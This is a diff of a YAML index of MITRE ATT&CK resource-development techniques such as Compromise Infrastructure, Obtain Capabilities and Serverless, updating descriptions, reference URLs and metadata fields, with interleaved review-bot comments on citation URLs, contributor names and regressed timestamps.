Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -109519,7 +110191,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -109606,11 +110278,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -109670,7 +110341,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -109712,7 +110382,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -109727,7 +110397,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -109818,11 +110487,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -109855,15 +110523,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
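Review bot: The re-wrapped description in this hunk now breaks `(Citation: iOS URL Scheme)` and `(Citation: Talos IPFS 2022)` across lines; that is harmless because the scalar is double-quoted and YAML folds each line break into a single space, so the citation keys still resolve as written. The new phrase `one-time, single use links` would read better as `single-use`, but since this mirrors upstream ATT&CK wording it should be raised there rather than edited locally. The contributor rename from `Goldstein Menachem` to `Menachem Goldstein` is applied here and again in the T1608.006 hunk below; if any other technique in the index credits the same contributor it should get the same normalization in this change so one person is not listed under two names.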
@@ -109947,7 +110616,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -110001,7 +110669,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -110052,36 +110719,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -110090,21 +110731,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
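Review bot: Field for field, this hunk restores everything the previous hunk removed from T1588.002 (platforms, domains, contributors, id, type, created, created_by_ref, external_references, object_marking_refs); only `spec_version` is gone for good, `revoked: false` and `x_mitre_deprecated: false` are newly written out, and `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0. The one substantive data change is the Recorded Future reference, whose URL moves from `https://www.recordedfuture.com/identifying-cobalt-strike-servers/` to `https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers` with `Retrieved` updated to September 16, 2024; worth a quick check that the new path resolves directly rather than through a redirect. Everything else is key reordering, which makes the diff far larger than its content; emitting keys in a deterministic order from the generator would keep future index updates reviewable.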
@@ -110150,17 +110817,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -110186,7 +110852,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -110218,8 +110884,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
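Review bot: This hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1585.001 with no replacement anywhere in the hunk, while in the same diff T1588.002 and T1584.006 are bumped to 3.2.0. Together with the `modified` timestamp in the preceding hunk moving back from `2022-04-25T14:00:00.188Z` to `2021-10-16T17:37:34.563Z`, this looks like the object was emitted from a revision that predates the 2.1.0 metadata rather than from a newer one. The same pair of changes (older `modified`, `x_mitre_attack_spec_version` dropped) appears below for T1587.004, T1608.003 and T1588.003. Please confirm which ATT&CK bundle the generator read: if these objects are genuinely meant to be older than what the index held before, the commit message should say why; if not, the input data should be refreshed before this merges.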
@@ -110246,7 +110910,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -110270,8 +110934,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -110297,7 +110959,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -110331,8 +110993,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -110380,7 +111040,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -110396,7 +111056,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -110455,54 +111114,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -110513,22 +111128,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
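Review bot: All eight external references removed from T1588 in the previous hunk reappear in this one, only reordered, so none of the citations used in the `x_mitre_detection` text (`FireEyeSupplyChain`, `Analyzing CS Dec 2020`, `Splunk Kovar Certificates 2017`, `Recorded Future Beacon Certificates`) has lost its target. The one reference whose data changes is `Recorded Future Beacon Certificates`: URL from `https://www.recordedfuture.com/cobalt-strike-servers/` to `https://www.recordedfuture.com/research/cobalt-strike-servers`, `Retrieved` moved to September 16, 2024. `x_mitre_version: '1.1'` is unchanged, which is correct since only serialization and a reference URL moved, not ATT&CK content.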
@@ -110591,37 +111250,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -110645,11 +111305,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
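Review bot: The new `GWS Apps Script Abuse 2021` reference in this hunk has a URL ending in `#google_vignette`, which is the fragment that Google's interstitial ad unit appends to the address bar, not part of the canonical article URL; it should be trimmed to `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`. If this index is meant to mirror upstream ATT&CK verbatim, the fix belongs upstream and the fragment can be tolerated here, but it is worth flagging either way so the stray fragment does not propagate into other consumers of the index.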
@@ -110707,17 +111370,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
